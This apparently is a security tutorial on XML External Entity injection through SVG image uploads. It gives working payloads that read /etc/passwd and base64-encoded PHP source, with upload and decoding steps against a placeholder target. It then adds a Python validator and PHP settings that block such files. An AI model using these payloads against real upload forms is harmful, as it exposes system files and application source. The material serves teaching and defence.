XML EXTERNAL ENTITY (XXE)
XML External Entity (XXE) injection is a security vulnerability that occurs when an application parses XML input containing references to external entities. If the XML parser is improperly configured, an attacker can use XXE to read sensitive data, perform server-side request forgery (SSRF), or even execute arbitrary code. This method applies to web applications that allow the upload of XML documents (an SVG image is an XML document, so an image upload form is a common entry point).
READING SYSTEM FILES
root@oco:~$ nano svgImage.svg
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
&xxe;
</svg>
* line 1 <?xml...> is the standard XML declaration at the top of the document
- it declares that the document is an XML file following version 1.0 of the XML standard, with UTF-8 character encoding
* line 2 <!DOCTYPE...> declares a Document Type Definition (DTD) for the XML document; it defines the structure and entities used in the document
- the <!ENTITY xxe...> declaration defines an external entity named xxe whose value is the content of the resource named after SYSTEM
- this is the payload
* line 3 <svg xmlns...> is the root element of the SVG file
- it defines the parameters (namespace, version, dimensions) of the SVG image
* line 4 <rect...> defines a rectangle in the SVG
* line 5 &xxe; is a reference to the external entity xxe defined in the DTD
- when the XML parser processes this file, it replaces &xxe; with the contents of /etc/passwd
root@oco:~$ BROWSER {targetSite:port}
upload form: svgImage.svg
* once uploaded, the XXE payload triggers when the server parses the file
root@oco:~$ BROWSER {targetSite:port} > CTRL+U
* ALT: root@oco:~$ curl -v http://{targetSite:port}
* the output of the triggered payload can be seen in the page's source code (CTRL+U in the browser, or the raw response from curl)
READ SOURCE IN PHP WEBAPPS
root@oco:~$ nano svgImage.svg
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
&xxe;
</svg>
root@oco:~$ BROWSER {targetSite:port}
upload form: svgImage.svg
* once uploaded, the XXE payload triggers when the server parses the file
root@oco:~$ curl -v http://{targetSite:port}
* the returned content is base64 encoded (php://filter/convert.base64-encode wraps the file so that PHP tags do not break the XML); copy the string and decode it
root@oco:~$ echo {base64String} | base64 -d
* decoding the base64 encoded string will let you read the source of index.php
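Both payloads above (the file:// read and the php://filter source read) depend on the server's XML parser honouring a DOCTYPE with an external entity. The following is an added defensive example, not code from the original page: a Python check, using only the standard library's expat binding, that an upload handler can run on an SVG before any image library touches it. It parses with a parser that never fetches anything external, records every DOCTYPE, entity declaration and external entity reference, and rejects the file if any are present (an SVG image never legitimately needs a DTD). The two sample documents are constructed inline from the page's payload shape; the function names and the rejection policy are this example's own assumptions.

```python
import xml.parsers.expat as expat

# Constructed sample inputs (not from a real target): the page's XXE payload
# shape and a benign SVG of the same size.
XXE_SVG = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
&xxe;
</svg>
'''

CLEAN_SVG = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
</svg>
'''


def inspect_xml(data: str) -> dict:
    """Parse with expat configured so nothing external is ever fetched, and
    record what the document tried to declare or reference."""
    findings = {"doctype": None, "entities": [], "external_refs": [], "error": None}
    parser = expat.ParserCreate()
    # Never load an external DTD subset or resolve parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = name

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # sysid is the SYSTEM identifier (e.g. file:///etc/passwd or a
        # php://filter URI); it is None for a purely internal entity.
        findings["entities"].append((name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # Called when a reference such as &xxe; would be expanded. Returning 1
        # tells expat the reference was handled, so parsing continues without
        # the URI ever being opened.
        findings["external_refs"].append(sysid)
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        findings["error"] = str(exc)
    return findings


def accept_svg_upload(data: str) -> tuple:
    """Upload policy (this example's assumption): an SVG image never needs a
    DTD, so any DOCTYPE, entity declaration or external reference is grounds
    for rejection. Returns (accepted, reasons)."""
    f = inspect_xml(data)
    reasons = []
    if f["error"]:
        reasons.append("malformed XML: " + f["error"])
    if f["doctype"] is not None:
        reasons.append("DOCTYPE present")
    for name, sysid in f["entities"]:
        reasons.append(f"entity {name!r} declared" + (f" -> {sysid}" if sysid else ""))
    for sysid in f["external_refs"]:
        reasons.append(f"external entity reference to {sysid}")
    return (not reasons, reasons)


if __name__ == "__main__":
    for label, doc in (("xxe", XXE_SVG), ("clean", CLEAN_SVG)):
        ok, why = accept_svg_upload(doc)
        print(label, "ACCEPTED" if ok else "REJECTED", why)
```

The same policy should be enforced in the parser that actually renders or stores the SVG: in PHP, do not pass LIBXML_NOENT to DOMDocument or SimpleXML loaders (that flag is what turns entity substitution on), and on PHP versions before 8.0 call libxml_disable_entity_loader(true) as well. Logging the rejection reasons from this check also gives a detection signal: a DOCTYPE in an uploaded image is a strong indicator of an XXE probe.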